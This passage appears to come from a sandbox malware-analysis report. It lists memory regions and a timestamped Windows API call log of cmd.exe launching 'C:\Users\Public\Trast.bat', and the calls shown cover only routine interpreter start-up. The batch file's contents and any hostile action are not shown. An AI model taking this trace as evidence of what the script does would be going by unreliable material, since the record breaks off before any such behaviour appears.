"\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 458 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 459 start_va = 0x4d0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 461 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 462 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 481 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 482 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 683 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 684 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 685 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 686 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 687 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 688 start_va = 0x7b0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 689 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 693 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 694 start_va = 0x6cc30000 end_va = 0x6cc37fff monitored = 0 entry_point = 0x6cc31840 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 695 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 696 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 697 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 698 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 699 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 700 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 701 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Thread: id = 10 os_tid = 0x820 [0127.630] GetModuleHandleA (lpModuleName=0x0) returned 0x1050000 [0127.630] __set_app_type (_Type=0x1) [0127.630] __p__fmode () returned 0x74344d6c [0127.630] __p__commode () returned 0x74345b1c [0127.630] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1065200) returned 0x0 [0127.630] __getmainargs (in: _Argc=0x10760e8, _Argv=0x10760ec, _Env=0x10760f0, _DoWildCard=0, _StartInfo=0x10760fc | out: _Argc=0x10760e8, _Argv=0x10760ec, _Env=0x10760f0) returned 0 [0127.632] GetCurrentThreadId () returned 0x820 [0127.632] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x820) returned 0x84 [0127.632] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0127.632] GetProcAddress (hModule=0x74530000, lpProcName="SetThreadUILanguage") returned 0x74572510 [0127.632] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.652] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.652] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0127.652] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.652] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.652] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.652] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.652] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.652] GetConsoleOutputCP () returned 0x1b5 [0127.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x107f460 | out: lpCPInfo=0x107f460) returned 1 [0127.653] SetConsoleCtrlHandler (HandlerRoutine=0x1070e40, Add=1) returned 1 [0127.653] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.653] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0127.653] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.653] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x107f40c | out: lpMode=0x107f40c) returned 1 [0127.654] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.654] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0127.654] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.654] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x107f408 | out: lpMode=0x107f408) returned 1 [0127.654] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.654] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0127.654] GetEnvironmentStringsW () returned 0x5b7e58* [0127.654] GetProcessHeap () returned 0x5b0000 [0127.654] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xacc) returned 0x5b8930 [0127.655] FreeEnvironmentStringsA (penv="A") returned 1 [0127.655] GetProcessHeap () returned 0x5b0000 [0127.655] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4) returned 0x5b0550 [0127.655] GetEnvironmentStringsW () returned 0x5b7e58* [0127.655] GetProcessHeap () returned 0x5b0000 [0127.655] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xacc) returned 0x5b9408 [0127.655] FreeEnvironmentStringsA (penv="A") returned 1 [0127.655] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0127.655] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0127.655] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0127.655] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0127.655] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0127.656] RegCloseKey (hKey=0x94) returned 0x0 [0127.656] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0127.656] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0127.656] RegCloseKey (hKey=0x94) returned 0x0 [0127.656] time (in: timer=0x0 | out: timer=0x0) returned 0x6152bad9 [0127.656] srand (_Seed=0x6152bad9) [0127.656] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Public\\Trast.bat\" \"" [0127.656] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Public\\Trast.bat\" \"" [0127.656] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1087720 | out: lpBuffer="C:\\Users\\Public") returned 0xf [0127.658] GetProcessHeap () returned 0x5b0000 [0127.658] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5b7e58 [0127.658] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b7e60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0127.658] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0127.658] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0127.658] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.658] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.658] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.658] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.658] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.658] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.658] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.658] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.658] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.658] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.658] GetProcessHeap () returned 0x5b0000 [0127.658] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b8930) returned 1 [0127.658] GetEnvironmentStringsW () returned 0x5b8070* [0127.658] GetProcessHeap () returned 0x5b0000 [0127.658] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xae4) returned 0x5ba9d0 [0127.659] FreeEnvironmentStringsA (penv="A") returned 1 [0127.659] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0127.659] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.659] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.659] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.659] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.659] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.659] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.659] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.659] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.659] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.659] GetProcessHeap () returned 0x5b0000 [0127.659] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x28) returned 0x5b0578 [0127.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\Public") returned 0xf [0127.659] GetFullPathNameW (in: lpFileName="C:\\Users\\Public", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\Public", lpFilePart=0x19fc4c*="Public") returned 0xf [0127.659] GetFileAttributesW (lpFileName="C:\\Users\\Public" (normalized: "c:\\users\\public")) returned 0x11 [0127.660] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5b05c8 [0127.660] FindClose (in: hFindFile=0x5b05c8 | out: hFindFile=0x5b05c8) returned 1 [0127.660] FindFirstFileW (in: lpFileName="C:\\Users\\Public", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xddf953cd, ftLastAccessTime.dwHighDateTime=0x1d7b434, ftLastWriteTime.dwLowDateTime=0xddf953cd, ftLastWriteTime.dwHighDateTime=0x1d7b434, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0x5b05c8 [0127.661] FindClose (in: hFindFile=0x5b05c8 | out: hFindFile=0x5b05c8) returned 1 [0127.661] GetFileAttributesW (lpFileName="C:\\Users\\Public" (normalized: "c:\\users\\public")) returned 0x11 [0127.661] SetCurrentDirectoryW (lpPathName="C:\\Users\\Public" (normalized: "c:\\users\\public")) returned 1 [0127.661] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\Public") returned 1 [0127.661] GetProcessHeap () returned 0x5b0000 [0127.661] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5ba9d0) returned 1 [0127.661] GetEnvironmentStringsW () returned 0x5b8070* [0127.661] GetProcessHeap () returned 0x5b0000 [0127.661] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb0c) returned 0x5b9ee0 [0127.661] FreeEnvironmentStringsA (penv="=") returned 1 [0127.661] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1087720 | out: lpBuffer="C:\\Users\\Public") returned 0xf [0127.661] GetProcessHeap () returned 0x5b0000 [0127.661] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b0578) returned 1 [0127.662] GetProcessHeap () returned 0x5b0000 [0127.662] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400e) returned 0x5bbfd8 [0127.662] GetProcessHeap () returned 0x5b0000 [0127.662] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4a) returned 0x5ba9f8 [0127.662] GetProcessHeap () returned 0x5b0000 [0127.662] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4008) returned 0x5bfff0 [0127.663] GetProcessHeap () returned 0x5b0000 [0127.663] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4008) returned 0x5c4000 [0127.663] GetProcessHeap () returned 0x5b0000 [0127.663] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbfd8) returned 1 [0127.663] GetConsoleOutputCP () returned 0x1b5 [0127.785] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x107f460 | out: lpCPInfo=0x107f460) returned 1 [0127.785] GetUserDefaultLCID () returned 0x409 [0127.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x10834a0, cchData=8 | out: lpLCData=":") returned 2 [0127.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x10834b0, cchData=8 | out: lpLCData="/") returned 2 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1083500, cchData=32 | out: lpLCData="Mon") returned 4 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1083540, cchData=32 | out: lpLCData="Tue") returned 4 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1083580, cchData=32 | out: lpLCData="Wed") returned 4 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x10835c0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1083600, cchData=32 | out: lpLCData="Fri") returned 4 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1083640, cchData=32 | out: lpLCData="Sat") returned 4 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1083680, cchData=32 | out: lpLCData="Sun") returned 4 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x10834c0, cchData=8 | out: lpLCData=".") returned 2 [0127.787] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x10834e0, cchData=8 | out: lpLCData=",") returned 2 [0127.787] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.789] GetProcessHeap () returned 0x5b0000 [0127.789] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20c) returned 0x5baa98 [0127.789] GetConsoleTitleW (in: lpConsoleTitle=0x5baa98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.813] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0127.813] GetProcAddress (hModule=0x74530000, lpProcName="CopyFileExW") returned 0x7454ffc0 [0127.813] GetProcAddress (hModule=0x74530000, lpProcName="IsDebuggerPresent") returned 0x7454b0b0 [0127.813] GetProcAddress (hModule=0x74530000, lpProcName="SetConsoleInputExeNameW") returned 0x76d3b440 [0127.814] GetProcessHeap () returned 0x5b0000 [0127.814] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5bbfd8 [0127.814] GetProcessHeap () returned 0x5b0000 [0127.814] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbfd8) returned 1 [0127.814] _wcsicmp (_String1="\"C:\\Users\\Public\\Trast.bat\"", _String2=")") returned -7 [0127.815] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\Public\\Trast.bat\"") returned 68 [0127.815] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\Public\\Trast.bat\"") returned 68 [0127.815] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\Public\\Trast.bat\"") returned 71 [0127.815] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\Public\\Trast.bat\"") returned 71 [0127.815] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\Public\\Trast.bat\"") returned 80 [0127.815] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\Public\\Trast.bat\"") returned 80 [0127.815] GetProcessHeap () returned 0x5b0000 [0127.815] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x58) returned 0x5bacb0 [0127.815] GetProcessHeap () returned 0x5b0000 [0127.815] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x40) returned 0x5bad10 [0127.815] GetProcessHeap () returned 0x5b0000 [0127.815] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5b0578 [0127.816] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.817] GetFileAttributesW (lpFileName="\"C:\\Users\\Public\\Trast.bat\"" (normalized: "c:\\users\\public\\\"c:\\users\\public\\trast.bat\"")) returned 0xffffffff [0127.817] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0127.818] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0127.818] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0127.818] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0127.818] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0127.818] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0127.818] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0127.818] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0127.818] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0127.818] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0127.818] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0127.818] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0127.818] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0127.818] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0127.818] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0127.818] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0127.818] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0127.818] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0127.818] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0127.818] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0127.818] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0127.818] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0127.818] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0127.818] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0127.818] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0127.818] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0127.818] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0127.819] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0127.819] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0127.819] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0127.819] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0127.819] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0127.819] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0127.819] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0127.819] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0127.819] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0127.819] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0127.819] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0127.819] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0127.819] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0127.819] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0127.819] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0127.819] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0127.819] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0127.819] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0127.819] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0127.819] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 